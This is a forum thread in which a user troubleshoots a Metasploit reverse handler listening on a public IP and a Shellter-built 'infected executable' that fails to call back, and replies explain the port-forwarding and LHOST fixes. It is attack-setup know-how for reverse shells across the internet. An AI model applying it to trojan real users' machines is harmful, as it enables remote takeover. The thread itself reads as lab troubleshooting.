Forum Thread: Two Issues with Metasploit and External IP

I am having some issues that I can't seem to solve.

2 Laptops - One running Kali though bootable USB. The other Windows 8.1
2 Networks. I have Kali running on my home network and Windows 8.1 running on my Mobile hotspot.
I have tried Metasploit and Armitage with the same issue.

Example external IP: 123.123.123.123
Private Local IP of Kali: 192.168.0.72
Home network has 6996 port forwarded for Kali

Exploit/multi/handler
set lhost 123.123.123.123
set lport 6996
..... other commands.
exploit -j

Exploit running as background job. Started reverse handler on 192.168.0.72:6996 (This is one of my issues. I set the lhost to the external, not internal)

So I do jobs -K
re-type set lhost 123.123.123.123
exploit -j
Handler failed to find to 123.123.123.123:6996
started reverse handler on 0.0.0.0:6996
starting the payload handler...
(This is what I normally get when I do this and it worked just fine in the past.)

Issue number 2 is: Go to my Windows 8.1 laptop. Run Shellter to create an infected executable. Set lhost 123.123.123.123 set lport 6996.

After it's created and I run it, it will not connect.

If I create a file with shellter with the lhost as the local IP 192.168.0.72 and set metasploit to listen on that and put both laptops on the same network it works just fine.

I have tried it will Metasploit not updated and with it updated. I have tried different versions of Shellter with the same result. I believe issue one is causing issue 2.

Any ideas?

2 Responses

Fixed my issues. Not sure how I fixed the first issue. I restarted Kali and it started working like normal, even though I had tried that before posting this question. Second problem was that I had used the Windows 8.1 laptop previously for Kali and had the same port forwarded in the home router. Once I realized that and removed it, the exploit worked as it should. .

on second time you have to type your private ip in lhost instead of public that's where you miss the point

Share Your Thoughts

  • Hot
  • Active